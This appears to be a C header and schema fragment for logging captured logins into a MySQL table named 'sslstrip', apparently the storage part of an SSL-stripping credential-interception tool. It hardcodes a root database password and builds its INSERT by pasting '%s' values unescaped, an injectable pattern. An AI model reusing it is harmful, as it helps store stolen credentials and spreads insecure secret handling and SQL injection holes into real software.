#define DB_HOST "localhost"
#define DB_USER "root"
#define DB_PASS "spxmdnjzmwjdqhr"
#define DB_NAME "ssl"

#define SQL_INSERT_RECORD "INSERT INTO `sslstrip` ( `no` , `id` , `pw`, `_time`, `host`, `body` ) \
    VALUES (\
    NULL ,'%s', '%s', '%s', '%s', '%s'\
    );"


no : integer(auto increment)
id : string 32
pw : string 32
_time: string 64
host: string 128
body: string 1024